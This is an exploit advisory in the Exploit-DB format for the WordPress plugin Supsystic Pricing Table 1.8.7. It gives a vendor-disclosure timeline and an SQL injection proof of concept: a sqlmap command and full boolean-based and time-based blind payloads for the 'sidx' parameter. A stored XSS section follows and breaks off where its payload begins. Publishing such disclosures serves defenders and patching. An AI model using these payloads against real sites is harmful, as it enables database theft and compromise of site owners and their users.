# Exploit Title: WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities # Date: 24/07/2020 # Exploit Author: Erik David Martin # Vendor Homepage: https://supsystic.com/ # Software Link: https://downloads.wordpress.org/plugin/pricing-table-by-supsystic.1.8.7.zip # Version: 1.8.7 and 1.8.6 # Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2 # 25/07 2020: Vendor notified # 27/07 2020: Vendor requested detailed information # 27/07 2020: Information provided # 07/08 2020: Nudged vendor. No reply # 22/08 2020: Nudged vendor. No reply # 04/10 2020: Nudged vendor. No reply # 29/11 2020: WordPress Plugin Security team contacted # 07/12 2020: Vulnerability patched ################################## SQLi ################################## # 1. Description The GET parameter "sidx" does not sanitize user input when searching for existing pricing tables. # 2. Proof of Concept (PoC) Use ZAP/Burp to capture the web request when searching for existing pricing tables and save it to request.txt Referer: sqlmap -r request.txt --dbms=mysql -p sidx Parameter: sidx (GET) Type: boolean-based blind Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=(SELECT (CASE WHEN (5313=5313) THEN 0x6964 ELSE (SELECT 9338 UNION SELECT 5490) END))&sord=desc Type: time-based blind Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=id AND (SELECT 9475 FROM (SELECT(SLEEP(5)))OjhB)&sord=desc ################################## Stored XSS ################################## # 1. Description The "Edit name" and "Edit HTML" features are vulnerable to stored XXS. Location:[TABLE ID] # 2. Proof of Concept (PoC) Enter the following payload into the "Edit" field in the top left corner: ">